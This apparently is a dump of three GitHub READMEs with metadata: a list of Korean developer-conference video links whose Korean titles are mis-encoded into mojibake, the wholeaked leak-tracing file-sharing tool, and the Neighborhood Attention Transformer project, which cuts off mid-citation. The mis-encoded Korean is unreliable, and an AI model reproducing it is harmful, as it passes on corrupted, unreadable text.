Engage](https://www.youtube.com/playlist?list=PL6RQwUkx6VTRUeQzsqVg-DgH38ME96w4F) | [FlutterDay 2020](https://www.youtube.com/playlist?list=PL6RQwUkx6VTSmCR632XO0_cGVN7JjeMHg) | [Flutter I/O Extended Korea](https://youtu.be/2zNYDTOLkzU?list=PL6RQwUkx6VTT49sWkCaWqb__6fEcc7AkH&t=1788) - 2022.06.26 - [Flutter Forward Extended Korea](https://www.youtube.com/playlist?list=PL6RQwUkx6VTRLPlCimOmv8UeLKC9FAlzf) - 2023.04.01 - ๊ทธ๋ฆฐ๋žฉ์Šค ์†กํŒŒ ํด๋กœ์ € - [Dev Dive 2022 - ํ•จ์ˆ˜ํ˜• ๊ฐœ๋ฐœ์ž๋กœ ์„ฑ์žฅํ•˜๊ธฐ](https://www.youtube.com/playlist?list=PLOdBZFDkhfV00trSo0SEdHMTaLruDNTzV) - 2022.11.08~09 - Clojure [2022 meetup+](https://youtu.be/BdSoNmWksuk) - 2022.06.10 - ์ฝ”๋“œ์Šค์ฟผ๋“œ - [๋ ˆ์ธ ์Šค์œ„ํ”„ํŠธ](https://letswift.kr) - [2020 ํ…Œํฌํ† ํฌ Day](https://www.youtube.com/playlist?list=PLAHa1zfLtLiPnvGyT0Qzt58nNfMAL8JER) | [2022](https://www.youtube.com/playlist?list=PLAHa1zfLtLiPunFALpY6c_ml_Kmpgya0J) | [2023](https://www.youtube.com/playlist?list=PLAHa1zfLtLiPY9gDxRwhNDbYZvjFKiurH) - 2023.10.13 - [ํ•œ๊ตญ R ์ปจํผ๋Ÿฐ์Šค](https://use-r.kr) - [ํ•œ๊ตญ R ์ปจํผ๋Ÿฐ์Šค 2021](https://www.youtube.com/playlist?list=PLhTWL0svc2zy4FB-Dy1yrAaYLmrUjXrPg) - 2021.11.19 - Seoul R Meetup - [2021](https://www.youtube.com/playlist?list=PLhTWL0svc2zyVdv-sgLQFs9SHtk31JMEJ) | [2023](https://www.youtube.com/playlist?list=PLhTWL0svc2zzMcB6UAOY2zklOApy33T0H) - 2023.05.11 ## ์˜คํ”ˆ์†Œ์Šค - ์˜คํ”ˆ์†Œ์Šค ์†Œํ”„ํŠธ์›จ์–ด ํ†ตํ•ฉ์ง€์›์„ผํ„ฐ, ์˜คํ”ˆ์—…(Open UP) - ์˜คํ”ˆ ํ…Œํฌ๋„ท ์„œ๋ฐ‹(Open Technet Summit) - [2020 | 2021 | 2022 | 2023](https://www.youtube.com/playlist?list=PL8MaVgZDhGk_E0jjMCeTyW3qz5uh86YtJ) - 2023.09.14 - [2020,2021,2022,2023 ๊ณต๊ฐœ์†Œํ”„ํŠธ์›จ์–ด ํŽ˜์Šคํ‹ฐ๋ฒŒ](https://www.youtube.com/playlist?list=PL8MaVgZDhGk_6lUMRnoGQO8Xy4d3RXTDa) - 2023.09.14 - [์ œ9ํšŒ ํ•œ๊ตญ ์ปค๋ฎค๋‹ˆํ‹ฐ ๋ฐ์ด - KCD 2020](https://www.youtube.com/watch?v=Scj3YCVPsAU&list=PL8MaVgZDhGk9CYn_IkRkgnN1R7kpE582A&index=7) - 2020.11.07 - ํ•œ๊ตญ์ „์žํ†ต์‹ ์—ฐ๊ตฌ์› - [EOST(ETRI ์˜คํ”ˆ์†Œ์Šค ํ…Œํฌ๋ฐ์ด)](https://eostday.kr) - [2020 | 2021 | 2022 | 2023](https://www.youtube.com/playlist?list=PLGvb-9I0h7UitqxaXbs0SFvooVGkvEvTr) - 2023.10.11 ## ๊ต์œก - ๋„ค์ด๋ฒ„ ์ปค๋„ฅํŠธ์žฌ๋‹จ - [SEF](https://sef.connect.or.kr) - [2020, 2021, 2022, 2023](https://www.youtube.com/playlist?list=PLzUx59pIXJDzG0yMuVcvNFM0ErXk-W5Eg) - 2023.09.06~08 - ์ธํ”„๋Ÿฐ - [INFCON](https://infcon.day) - [2022](https://www.youtube.com/playlist?list=PLpkj8RKr48wZMPKR292FOoahqxVDi6d6R) | [2023](https://www.youtube.com/playlist?list=PLpkj8RKr48waFtrqvJjbNrpGCvdxyX8Nx) - 2023.08.15 - [ํ‡ด๊ทผ๊ธธ ๋ฐ‹์—…](https://www.youtube.com/playlist?list=PLpkj8RKr48wbl8rsApCB9nWDaSK23xRpM) - 2024.02.28 - ํ”„๋กœ๊ทธ๋ž˜๋จธ์Šค - [ํ”„๋กœ๊ทธ๋ž˜๋จธ์Šค ์˜จ๋ผ์ธ ์ปจํผ๋Ÿฐ์Šค 1st](https://www.youtube.com/playlist?list=PLz4XWo74AOafAHPTyd4ikJwRkXmptWXwI) - 2022.11.26 - [๋ฐ์ดํ„ฐ ์—”์ง€๋‹ˆ์–ด๋ง ์ปจํผ๋Ÿฐ์Šค](https://www.youtube.com/playlist?list=PLz4XWo74AOaeXlr6zxjA_24vr8qoSzxHE) - 2023.04.01 - [2022 ํ”„๋กœ๊ทธ๋ž˜๋จธ์Šค SILLY TALK](https://www.youtube.com/playlist?list=PLz4XWo74AOadffWyvALUKsNSW0pFBD1Dl) - 2022.10.15 - ์ด๋…ธ๋ฒ ์ด์…˜ ์•„์นด๋ฐ๋ฏธ - [INNO-CON](https://innocon.co.kr) - [แ„‹แ…ตแ„‚แ…ฉแ„‡แ…ฆแ„‹แ…ตแ„‰แ…งแ†ซแ„‹แ…กแ„แ…กแ„ƒแ…ฆแ„†แ…ต แ„‰แ…ฅแ†ผแ„€แ…ช แ„€แ…ฉแ†ผแ„‹แ…ฒ แ„แ…ฅแ†ซแ„‘แ…ฅแ„…แ…ฅแ†ซแ„‰แ…ณ 2020 ~ 2023](https://www.youtube.com/playlist?list=PLdaJq4f37m1p-0EEXIO7JDb3xXhlluWC4) - 2023.10.05 - [ํ”ผ๋กœ๊ทธ๋ž˜๋ฐ](https://pirogramming.com) - [2022 ๊ฒจ์šธ ํ”ผ๋กœ์ปจํผ๋Ÿฐ์Šค](https://www.youtube.com/playlist?list=PLslwDteUjPslzKLhryKb5IIaRg4fCz6Fw) - 2022.02.17~18 ## ์ปค๋ฎค๋‹ˆํ‹ฐ - AWS ํ•œ๊ตญ ์‚ฌ์šฉ์ž ๋ชจ์ž„ [AWSKRUG](https://awskrug.github.io) - AWS Community Day [Online 2020](https://www.youtube.com/playlist?list=PLX2fs3661XpMjuok2MTitzTxSaLXfxsBu) | [2020](https://www.youtube.com/playlist?list=PLX2fs3661XpPDIQb9pyDvflxz6yDdLnro) | [2021](https://www.youtube.com/playlist?list=PLX2fs3661XpOHFIaKMfEKP1FAvYf0rvEo) | [2022 Seoul - Home Coming Day](https://www.youtube.com/playlist?list=PLX2fs3661XpN1mBctkVosU5jxkusdBRxC) | [2023 Seoul](https://www.youtube.com/playlist?list=PLX2fs3661XpMrFZaU4i2y4RqylcuvfVLA) - 2023.10.28 - โœจ AWSKRUG Meetup [์„ฑ์ˆ˜](https://www.youtube.com/playlist?list=PLX2fs3661XpMOLPMLYAyMHlCYbHqwg6Fy) | [๊ตฌ๋””](https://www.youtube.com/playlist?list=PLX2fs3661XpOyBd4AQ1o8i9pL4gP7jZa0) | [Container](https://www.youtube.com/playlist?list=PLX2fs3661XpN2e_Gxt07jmAyp11zNGmwM) | [DataScience](https://www.youtube.com/playlist?list=PLX2fs3661XpMO995pE2jMp92jM4xkJz7w) | [Database](https://www.youtube.com/playlist?list=PLX2fs3661XpOJU6zVCP6oISzz4Pol2LJs) | [Deepracer](https://www.youtube.com/playlist?list=PLX2fs3661XpNNr_PFfV7Y0BngN_OxJfrE) | [Security](https://www.youtube.com/playlist?list=PLX2fs3661XpMRNU4vOSq-LJeDJ26LKxEx) | [Frontend](https://www.youtube.com/playlist?list=PLX2fs3661XpNfRSZ9TD_xyQdegvtNDsdw) | [GameTech](https://www.youtube.com/playlist?list=PLX2fs3661XpOKTk_J-UHHAcCn64O96ql9) | [Architecture](https://www.youtube.com/playlist?list=PLX2fs3661XpPrBgaLhrBk-OSV8EtTsAc-) - 2024.05.29 - ๊ตฌ๊ธ€ ๊ฐœ๋ฐœ์ž ๊ทธ๋ฃน(GDG KOREA) - I/O Extended - [2021 with doubleS](https://www.youtube.com/playlist?list=PLF_OUznA3RTTadLaKE9gVJY5MR6ncdmiX) | 2022 Seoul - [Part1](https://youtu.be/GfbJp3CHWBk?t=1696), [Part2](https://youtu.be/bU7F_Ca6xQ8?t=395) - 2022.06.20 - [Kotlin 'Summer' Night 2022 Seoul](https://youtu.be/3sX3Oki9PD8?t=295) - 2022.09.06 - [Devfest](https://www.facebook.com/devfest.seoul.2019) - [Korea 2020](https://www.youtube.com/playlist?list=PLF_OUznA3RTSoRHlcIRg4KZYSFJ6rfGfm) | Seoul 2021 [ํ˜ธ๋นต ํŠธ๋ž™](https://youtu.be/t_BVZkPc650?t=609), [๋ถ•์–ด๋นต ํŠธ๋ž™](https://youtu.be/HGy-PvnJC3g?t=609) - 2021.11.03 - GDG Daegu - [Code Action 1st](https://youtu.be/GngEX-zVo6Y?t=292) - 2022.08.27 - GDG SongDo - [Flutter](https://www.youtube.com/playlist?list=PLSCuU2a9seuO4xpzlC7dRjrVMhV6idD42) | [Machine Learning](https://www.youtube.com/playlist?list=PLSCuU2a9seuMJ6Ee-KTBDgokc9nfjwahJ) Meetup Songdo 23 - 2023.10.20 - ์˜คํ‚ค์ฝ”๋ฆฌ์•„ [OKKY](https://okky.kr) - [OKKYCON: 2021](https://www.youtube.com/playlist?list=PLhSAACiXcoKL4Jupof50JNmQi7_VI1-ne) - 2021.03.06 - [OKKY ์„ธ๋ฏธ๋‚˜](https://www.youtube.com/playlist?list=PLhSAACiXcoKIxl_lzk0u22hiXUY0f5yut) - 2023.12.19 - ๊ธฐํƒ€ - AWS Cloud Clubs - [EWHA ๋ฉค๋ฒ„ ํ…Œํฌํ†ก์„ธ์…˜](https://www.youtube.com/@AWSCloudClub_KR/videos) - 2024.02.13 ## ๊ธฐํƒ€ - 11๋ฒˆ๊ฐ€ - [TECH TALK](https://techtalk.11stcorp.com) - 2022 [DAY1](https://www.youtube.com/playlist?list=PL5ew9vtXjSu9EzCttLVM0uTTC26oBBRrR), [DAY2](https://www.youtube.com/playlist?list=PL5ew9vtXjSu8hZ3_F9CU2A7HlkGRyUMUQ) | 2023 [DAY1](https://www.youtube.com/playlist?list=PL5ew9vtXjSu9SEt-ttOVSDfucjmDUW-cy), [DAY2](https://www.youtube.com/playlist?list=PL5ew9vtXjSu_Ex8xvgqxxMr-NuUXkKEIc) - 2023.12.12~13 - ํ‹ฐ๋งฅ์Šค - [TmaxDay 2020](https://www.youtube.com/playlist?list=PLAmBb6Ov-e5sT7Lv6XUedwc-seLwy5lvJ) | [SuperWeek 2022](https://www.youtube.com/playlist?list=PLAmBb6Ov-e5sAPz-4sUEOoPQMc9CyUJBQ) - 2022.09.06~07 - ํ•œ๊ตญ์ „์žํ†ต์‹ ์—ฐ๊ตฌ์› - [ETRI CONFERENCE 2022](https://youtu.be/4z1zU2CyX6M?list=PLGvb-9I0h7UiT5plM2JTLTWDNlcby6OQg) | 2023 [1์ผ์ฐจ](https://youtu.be/LldtbXkn1go), [2์ผ์ฐจ](https://youtu.be/LA_VEuJPEdg) - 2023.11.07~08 - ์ „์ž์‹ ๋ฌธ ์›จ๋น„๋‚˜ ์ „๋ฌธ๋ฐฉ์†ก [allshow TV](https://www.allshowtv.com) - ๋…ธ์ฝ”๋“œยท๋กœ์šฐ์ฝ”๋“œ(NCLC) ์ž๋™ํ™” ์ž„ํŒฉํŠธ - [2023](https://www.youtube.com/playlist?list=PLumdCu9Q56KqHjfLS9iYcp2rHFCPpSutT) | [2024](https://www.youtube.com/playlist?list=PLumdCu9Q56KpO8eX5H022LmNmXoiKzYm5) - 2024.01.30 - [๋””์ง€ํ„ธ ํŠธ๋žœ์Šคํฌ๋ฉ”์ด์…˜(DX) & ์—”ํ„ฐํ”„๋ผ์ด์ฆˆ ํ…Œํฌ ๊ทธ๋žœ๋“œ ์„œ๋ฐ‹ 2022](https://www.youtube.com/playlist?list=PLumdCu9Q56KpbQr_bUOe9jdHSERpA240H) - 2022.03.25 - [์Šค๋งˆํŠธ ์ œ์กฐํ˜์‹  & ๋””์ง€ํ„ธ ํŠธ์œˆ ๊ทธ๋žœ๋“œ ์„œ๋ฐ‹ 2022](https://www.youtube.com/playlist?list=PLumdCu9Q56Komt4Au9L6Hy3fA4K4Enlze) - 2022.03.18 - [2022 ํด๋ผ์šฐ๋“œ ๋„ค์ดํ‹ฐ๋ธŒ & ๋””์ง€ํ„ธ ๊ฒฝํ—˜ ์ตœ์ ํ™” ๊ทธ๋žœ๋“œ ์›จ๋น„๋‚˜](https://www.youtube.com/playlist?list=PLumdCu9Q56KqtjXNhMwAIlKlEcMwiO0FX) - 2022.01.21 - [2022 ์Šค๋งˆํŠธ ๋””์ง€ํ„ธ ์›Œํฌํ”Œ๋ ˆ์ด์Šค ์ด๋…ธ๋ฒ ์ด์…˜ ์ปจํผ๋Ÿฐ์Šค](https://www.youtube.com/playlist?list=PLumdCu9Q56Koxg5-QgDjFiTJXl0YCWS-G) - 2022.04.28 - [AI Cyber Security Summit 2022](https://www.youtube.com/playlist?list=PLumdCu9Q56KoTyvg-1UEVQo-XXHfEnHr3) - 2022.06.29 - SMART WORK KOREA SUMMIT - [2021](https://www.youtube.com/playlist?list=PLumdCu9Q56KotSnS635wsz-U1dat3SkDa) | [2022](https://www.youtube.com/playlist?list=PLumdCu9Q56KpC23VodBNoqdoqGXaW5tD6) - 2022.08.25 - ์ฝ”๋ฆฌ์•„ RPA ๊ทธ๋žœ๋“œ ์„œ๋ฐ‹ - [2021](https://www.youtube.com/playlist?list=PLumdCu9Q56KrUlNz1Ei-UhrkU-EyMklZX) | [2022](https://www.youtube.com/playlist?list=PLumdCu9Q56KqSqutlFHBGFfn4VlMqwAyC) - 2022.04.29 - ๋””์ง€ํ„ธํˆฌ๋ฐ์ด [์›จ๋น„๋‚˜](http://www.digitaltoday.co.kr/bbs/list.html?table=bbs_27) - [Digital Today TV Live](https://www.youtube.com/playlist?list=PL28NueUz2IV-5FCDu8X0eHRwPOXtxXPXA) - 2022.05.26 - IT์กฐ์„  ์œ ํŠœ๋ธŒ ์ฑ„๋„ [ํ…Œํฌ์žผ์—ฐ๊ตฌ์†Œ](https://www.youtube.com/c/TechCafe2013) - ํด๋ผ์šฐ๋“œ ์˜จ๋ผ์ธ ์ปจํผ๋Ÿฐ์Šค [2022 ๋ฐ์ดํ„ฐ ๋“œ๋ฆฌ๋ธ ์‹œ๋Œ€](https://youtu.be/LC6rMLgH08g?list=PL18jcdQAgye-x3e4TO85gowHqWCUpH6Wo) | [2023 ๋””์ง€ํ„ธ ๋Œ€์ „ํ™˜๊ณผ ์ดˆ๊ฑฐ๋Œ€ AI](https://youtu.be/fmUoLHOJ7tQ?list=PL18jcdQAgye-x3e4TO85gowHqWCUpH6Wo) - 2023.03.29 - [AI ์ „๋ง 2022์›จ๋น„๋‚˜](https://www.youtube.com/playlist?list=PL18jcdQAgye-x3e4TO85gowHqWCUpH6Wo) | [AI&COULD 2024](https://www.youtube.com/playlist?list=PL18jcdQAgye9fWSDyHdvvGdty3OMB6afU) - 2024.03.27 - Startup Alliance Korea - ์‹ค๋ฆฌ์ฝ˜๋ฐธ๋ฆฌ์˜ ํ•œ๊ตญ์ธ - [2020](https://www.youtube.com/playlist?list=PLy5RUqlc3TGF_0HysuC1lWW0h0x9-jUqi) | [2021](https://www.youtube.com/playlist?list=PLy5RUqlc3TGFPLAlHx3sXz26bMoUM3LL-) | [2022](https://www.youtube.com/playlist?list=PLy5RUqlc3TGH9eHISCJ-HCOI1PNWw5fPT) | [2023](https://www.youtube.com/playlist?list=PLy5RUqlc3TGGFE41jnRQc5mB56qKGgUPy) - 2023.10.11 - Agile Korea - [AKC](https://www.facebook.com/AgileKoreaConference) - [2020](https://www.youtube.com/playlist?list=PLqLyqFSqvAE5ZmYBRsAaHIwfCKRBRaYqy) | [2021](https://www.youtube.com/playlist?list=PLqLyqFSqvAE4nquOU5p5-eeoxfkdZK5Th) - 2021.12.09 - ํ•œ๋น›๋ฏธ๋””์–ด - [๋ฐ๋ธŒ๊ทธ๋ผ์šด๋“œ 2019](https://www.youtube.com/playlist?list=PLVsNizTWUw7HxXDshrgEr5eeHf2cqjtqA) | [๋ฐ๋ธŒ๊ทธ๋ผ์šด๋“œ ์ฃผ๋‹ˆ์–ด 2019](https://www.youtube.com/playlist?list=PLVsNizTWUw7EOvb0_pJ94NZRnScD0jpzI) - 2019.12.13 ## ์ถ”๊ฐ€๋ฆฌ์†Œ์Šค - [๋ฌด๋ฃŒ ํ”„๋กœ๊ทธ๋ž˜๋ฐ Ebook](https://github.com/EbookFoundation/free-programming-books/blob/main/books/free-programming-books-ko.md) - [ํ”„๋กœ๊ทธ๋ž˜๋ฐ ์–ธ์–ด๋ณ„ ๋ฐ์ดํ„ฐ ๊ตฌ์กฐ ๋ฐ ์•Œ๊ณ ๋ฆฌ์ฆ˜ ํ•™์Šต](https://github.com/TheAlgorithms) ## ์ฐธ๊ณ ๋งํฌ - https://github.com/brave-people/Dev-Event
๐Ÿ€ ์ตœ๊ทผ ๊ตญ๋‚ด IT ์„ธ๋ฏธ๋‚˜ ๋ฐ ๊ฐœ๋ฐœ์ž๐Ÿ’ป ์ปจํผ๋Ÿฐ์Šค ์˜์ƒ์˜ ๋‹ค์‹œ ๋ณด๊ธฐ๐Ÿ‘€ ๋งํฌ๋ฅผ ํ•œ๊ณณ์— ์ •๋ฆฌํ–ˆ์Šต๋‹ˆ๋‹ค!
developer,conference,readme,it,korean,docs,ai,cloud,data,meeup
0
5
5
454
0
1
1
utkusen/wholeaked
# Introduction ``` ,_ ,' '\,_ Utku Sen's |_,-'_) wholeaked /##c '\ ( ' |' -{. ) "When you have eliminated the impossible, /\__-' \[] whatever remains, however improbable, /'-_'\ must be the truth" - Sherlock Holmes ' \ ``` wholeaked is a file-sharing tool that allows you to find the responsible person in case of a leakage. It's written in Go. ## How? wholeaked gets the file that will be shared and a list of recipients. It creates a unique signature for each recipient and adds it to the file secretly. After then, it can automatically send files to the corresponding recipients by using Sendgrid, AWS SES or SMTP integrations. Instead of sending them by e-mail, you can also share them manually. wholeaked works with every file type. However, it has additional features for common file types such as PDF, DOCX, MOV etc. ### Sharing Process ``` +-----------+ |Top Secret | |.pdf | | | -| | / | | / |Hidden | a@gov / |signature1 | / +-----------+ / +-----------+ +-----------++-----------+ / |Top Secret | |Top Secret ||Recipient | / |.pdf | |.pdf ||List | +---------+ / | | | || | |utkusen/ | / b@gov | | | ||a@gov |----->|wholeaked| /----------+ | | ||b@gov | | | \ |Hidden | | ||c@gov | +---------+ \ |signature2 | | || | \ +-----------+ +-----------++-----------+ \ +-----------+ \ |Top Secret | \ |.pdf | c@gov \ | | \ | | \ | | \ |Hidden | -|signature3 | +-----------+ ``` ### Validation Part To find who leaked the document, you just need to provide the leaked file to wholeaked, and it will reveal the responsible person by comparing the signatures in the database. ``` +-----------+ +---------+ |Top Secret | |Signature| |.pdf | +---------+|Database | | | |utkusen/ || | Document leaked by | |->|wholeaked|| |--------+ | | | || | b@gov |Hidden | +---------+| | |Signature2 | | | +-----------+ +---------+ ``` ## Demonstration Video [![Demo Video](https://img.youtube.com/vi/EEDtXp9ngHw/0.jpg)](https://www.youtube.com/watch?v=EEDtXp9ngHw) ## File Types and Detection Modes wholeaked can add the unique signature to different sections of a file. Available detection modes are given below: **File Hash:** SHA256 hash of the file. All file types are supported. **Binary:** The signature is directly added to the binary. *Almost* all file types are supported. **Metadata:** The signature is added to a metadata section of a file. Supported file types: PDF, DOCX, XLSX, PPTX, MOV, JPG, PNG, GIF, EPS, AI, PSD **Watermark:** An invisible signature is inserted into the text. Only PDF files are supported. # Installation ## From Binary You can download the pre-built binaries from the [releases](https://github.com/utkusen/wholeaked/releases/latest) page and run. For example: `unzip wholeaked_0.1.0_macOS_amd64.zip` `./wholeaked --help` ## From Source 1) Install Go on your system 2) Run: `go install github.com/utkusen/wholeaked@latest` ## Installing Dependencies wholeaked requires `exiftool` for adding signatures to metadata section of files. If you don't want to use this feature, you don't need to install it. 1) Debian-based Linux: Run `apt install exiftool` 2) macOS: Run `brew install exiftool` 3) Windows: Download exiftool from here https://exiftool.org/ and put the `exiftool.exe` in the same directory with wholeaked. wholeaked requires `pdftotext` for verifying watermarks inside PDF files. If you don't want to use this feature, you don't need to install it. 1) Download "Xpdf command line tools" for Linux, macOS or Windows from here: https://www.xpdfreader.com/download.html 2) Extract the archive and navigate to `bin64` folder. 3) Copy the `pdftotext` (or `pdftotext.exe`) executable to the same folder with wholeaked 4) For Debian Based Linux: Run `apt install libfontconfig` command. # Usage ## Basic Usage wholeaked requires a project name `-n`, the path of the base file which the signatures will add `-f` and a list of target recipients `-t` Example command: `./wholeaked -n test_project -f secret.pdf -t targets.txt` The `targets.txt` file should contain name and the e-mail address in the following format: ``` Utku Sen,utku@utkusen.com Bill Gates,bill@microsoft.com ``` After execution is completed, the following unique files will be generated: ``` test_project/files/Utku_Sen/secret.pdf test_project/files/Bill_Gates/secret.pdf ``` By default, wholeaked adds signatures to all available places that are defined in the "File Types and Detection Modes" section. If you don't want to use a method, you can define it with a `false` flag. For example: `./wholeaked -n test_project -f secret.pdf -t targets.txt -binary=false -metadata=false -watermark=false` ## Sending E-mails In order to send e-mails, you need to fill some sections in the `CONFIG` file. - If you want to send e-mails via Sendgrid, type your API key to the `SENDGRID_API_KEY` section. - If you want to send e-mails via AWS SES integration, you need to install `awscli` on your machine and add the required AWS key to it. wholeaked will read the key by itself. But you need to fill the `AWS_REGION` section in the config file. - If you want to send e-mails via a SMTP server, fill the `SMTP_SERVER`, `SMTP_PORT`, `SMTP_USERNAME`, `SMTP_PASSWORD` sections. The other necessary fields to fill: - `EMAIL_TEMPLATE_PATH` Path of the e-mail's body. You can specify use HTML or text format. - `EMAIL_CONTENT_TYPE` Can be `html` or `text` - `EMAIL_SUBJECT` Subject of the e-mail - `FROM_NAME` From name of the e-mail - `FROM_EMAIL` From e-mail of the e-mail To specify the sending method, you can use `-sendgrid`, `-ses` or `-smtp` flags. For example: `./wholeaked -n test_project -f secret.pdf -t targets.txt -sendgrid` ## Validating a Leaked File You can use the `-validate` flag to reveal the owner of a leaked file. wholeaked will compare the signatures detected in the file and the database located in the project folder. Example: `./wholeaked -n test_project -f secret.pdf -validate` **Important:** You shouldn't delete the `project_folder/db.csv` file if you want to use the file validation feature. If that file is deleted, wholeaked won't be able to compare the signatures. # Donation Loved the project? You can buy me a coffee <a href="https://www.buymeacoffee.com/utkusen" target="_blank"><img src="https://cdn.buymeacoffee.com/buttons/default-orange.png" alt="Buy Me A Coffee" height="41" width="174"></a>
a file-sharing tool that allows you to find the responsible person in case of a leakage
osint,security,file-sharing,privacy,privacy-tools
1
5
5
17
1
1
0
SHI-Labs/Neighborhood-Attention-Transformer
# Neighborhood Attention Transformers <a href="https://openaccess.thecvf.com/content/CVPR2023/html/Hassani_Neighborhood_Attention_Transformer_CVPR_2023_paper.html"><img src="https://img.shields.io/badge/CVPR2023-Neighborhood%20Attention%20Transformer-%2300B0F0" /></a> <a href="https://arxiv.org/abs/2209.15001"><img src="https://img.shields.io/badge/arXiv-Dilated%20Neighborhood%20Attention%20Trasnformer-%23C209C1" /></a> [<img src="https://img.shields.io/badge/CUDA%20Extension-NATTEN-%23fc6562" />](https://github.com/SHI-Labs/NATTEN) [![PWC](https://img.shields.io/endpoint.svg?url=https://paperswithcode.com/badge/dilated-neighborhood-attention-transformer/instance-segmentation-on-ade20k-val)](https://paperswithcode.com/sota/instance-segmentation-on-ade20k-val?p=dilated-neighborhood-attention-transformer) [![PWC](https://img.shields.io/endpoint.svg?url=https://paperswithcode.com/badge/dilated-neighborhood-attention-transformer/panoptic-segmentation-on-ade20k-val)](https://paperswithcode.com/sota/panoptic-segmentation-on-ade20k-val?p=dilated-neighborhood-attention-transformer) [![PWC](https://img.shields.io/endpoint.svg?url=https://paperswithcode.com/badge/dilated-neighborhood-attention-transformer/instance-segmentation-on-cityscapes-val)](https://paperswithcode.com/sota/instance-segmentation-on-cityscapes-val?p=dilated-neighborhood-attention-transformer) [![PWC](https://img.shields.io/endpoint.svg?url=https://paperswithcode.com/badge/dilated-neighborhood-attention-transformer/panoptic-segmentation-on-coco-minival)](https://paperswithcode.com/sota/panoptic-segmentation-on-coco-minival?p=dilated-neighborhood-attention-transformer) [![PWC](https://img.shields.io/endpoint.svg?url=https://paperswithcode.com/badge/dilated-neighborhood-attention-transformer/semantic-segmentation-on-ade20k-val)](https://paperswithcode.com/sota/semantic-segmentation-on-ade20k-val?p=dilated-neighborhood-attention-transformer) [![PWC](https://img.shields.io/endpoint.svg?url=https://paperswithcode.com/badge/dilated-neighborhood-attention-transformer/semantic-segmentation-on-cityscapes-val)](https://paperswithcode.com/sota/semantic-segmentation-on-cityscapes-val?p=dilated-neighborhood-attention-transformer) [![PWC](https://img.shields.io/endpoint.svg?url=https://paperswithcode.com/badge/dilated-neighborhood-attention-transformer/panoptic-segmentation-on-cityscapes-val)](https://paperswithcode.com/sota/panoptic-segmentation-on-cityscapes-val?p=dilated-neighborhood-attention-transformer) [![PWC](https://img.shields.io/endpoint.svg?url=https://paperswithcode.com/badge/dilated-neighborhood-attention-transformer/instance-segmentation-on-coco-minival)](https://paperswithcode.com/sota/instance-segmentation-on-coco-minival?p=dilated-neighborhood-attention-transformer) [![PWC](https://img.shields.io/endpoint.svg?url=https://paperswithcode.com/badge/stylenat-giving-each-head-a-new-perspective/image-generation-on-ffhq-256-x-256)](https://paperswithcode.com/sota/image-generation-on-ffhq-256-x-256?p=stylenat-giving-each-head-a-new-perspective) [![PWC](https://img.shields.io/endpoint.svg?url=https://paperswithcode.com/badge/stylenat-giving-each-head-a-new-perspective/image-generation-on-ffhq-1024-x-1024)](https://paperswithcode.com/sota/image-generation-on-ffhq-1024-x-1024?p=stylenat-giving-each-head-a-new-perspective) [![PWC](https://img.shields.io/endpoint.svg?url=https://paperswithcode.com/badge/stylenat-giving-each-head-a-new-perspective/image-generation-on-lsun-churches-256-x-256)](https://paperswithcode.com/sota/image-generation-on-lsun-churches-256-x-256?p=stylenat-giving-each-head-a-new-perspective) ![NAT-Intro](assets/dinat/intro_dark.png#gh-dark-mode-only) ![NAT-Intro](assets/dinat/intro_light.png#gh-light-mode-only) **Powerful hierarchical vision transformers based on sliding window attention.** Neighborhood Attention (NA, local attention) was introduced in our original paper, [NAT](NAT.md), and runs efficiently with our extension to PyTorch, [NATTEN](https://github.com/SHI-Labs/NATTEN). We recently introduced a new model, [DiNAT](DiNAT.md), which extends NA by dilating neighborhoods (DiNA, sparse global attention, a.k.a. dilated local attention). Combinations of NA/DiNA are capable of preserving locality, maintaining translational equivariance, expanding the receptive field exponentially, and capturing longer-range inter-dependencies, leading to significant performance boosts in downstream vision tasks, such as [StyleNAT](https://github.com/SHI-Labs/StyleNAT) for image generation. # News ### March 25, 2023 * Neighborhood Attention Transformer was accepted to CVPR 2023! ### November 18, 2022 * NAT and DiNAT are now available through HuggingFace's [transformers](https://github.com/huggingface/transformers). * NAT and DiNAT classification models are also available on the HuggingFace's Model Hub: [NAT](https://huggingface.co/models?filter=nat) | [DiNAT](https://huggingface.co/models?filter=dinat) ### November 11, 2022 * New preprint: [StyleNAT: Giving Each Head a New Perspective](https://github.com/SHI-Labs/StyleNAT). * Style-based GAN powered with Neighborhood Attention sets new SOTA on FFHQ-256 with a 2.05 FID. ![stylenat](assets/stylenat/stylenat.png) ### October 8, 2022 * [NATTEN](https://github.com/SHI-Labs/NATTEN) is now [available as a pip package](https://www.shi-labs.com/natten/)! * You can now install NATTEN with pre-compiled wheels, and start using it in seconds. * NATTEN will be maintained and developed as a [separate project](https://github.com/SHI-Labs/NATTEN) to support broader usage of sliding window attention, even beyond computer vision. ### September 29, 2022 * New preprint: [Dilated Neighborhood Attention Transformer](DiNAT.md). # Dilated Neighborhood Attention :fire: ![DiNAT-Abs](assets/dinat/radar_dark.png#gh-dark-mode-only) ![DiNAT-Abs](assets/dinat/radar_light.png#gh-light-mode-only) A new hierarchical vision transformer based on Neighborhood Attention (local attention) and Dilated Neighborhood Attention (sparse global attention) that enjoys significant performance boost in downstream tasks. Check out the [DiNAT README](DiNAT.md). # Neighborhood Attention Transformer ![NAT-Abs](assets/nat/computeplot_dark.png#gh-dark-mode-only) ![NAT-Abs](assets/nat/computeplot_light.png#gh-light-mode-only) Our original paper, [Neighborhood Attention Transformer (NAT)](NAT.md), the first efficient sliding-window local attention. # How Neighborhood Attention works Neighborhood Attention localizes the query token's (red) receptive field to its nearest neighboring tokens in the key-value pair (green). This is equivalent to dot-product self attention when the neighborhood size is identical to the image dimensions. Note that the edges are special (edge) cases. ![720p_fast_dm](assets/nat/720p_fast_dm.gif#gh-dark-mode-only) ![720p_fast_lm](assets/nat/720p_fast_lm.gif#gh-light-mode-only) # Citation ```bibtex @inproceedings{hassani2023neighborhood, title = {Neighborhood Attention Transformer}, author = {Ali Hassani and Steven Walton and Jiachen Li and Shen Li and Humphrey Shi}, booktitle = {Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition (CVPR)}, month = {June}, year = {2023}, pages = {6185-6194} } @article{hassani2022dilated, title = {Dilated Neighborhood Attention Transformer}, author = {Ali Hassani and Humphrey Shi}, year = 2022, url = {https://arxiv.org/abs/2209.15001}, eprint = {2209.15001}, archiveprefix = {arXiv}, primaryclass = {cs.CV} } @article{walton2022stylenat, title = {StyleNAT: Giving Each Head a New Perspective}, author = {Steven Walton and Ali Hassani and Xingqian Xu and Zhangyang Wang and Humphrey Shi}, year = 2022, url = {https://arxiv.org/abs/2211.05770}, eprint = {2211.05770}, archiveprefix = {arXiv}, primaryclass = 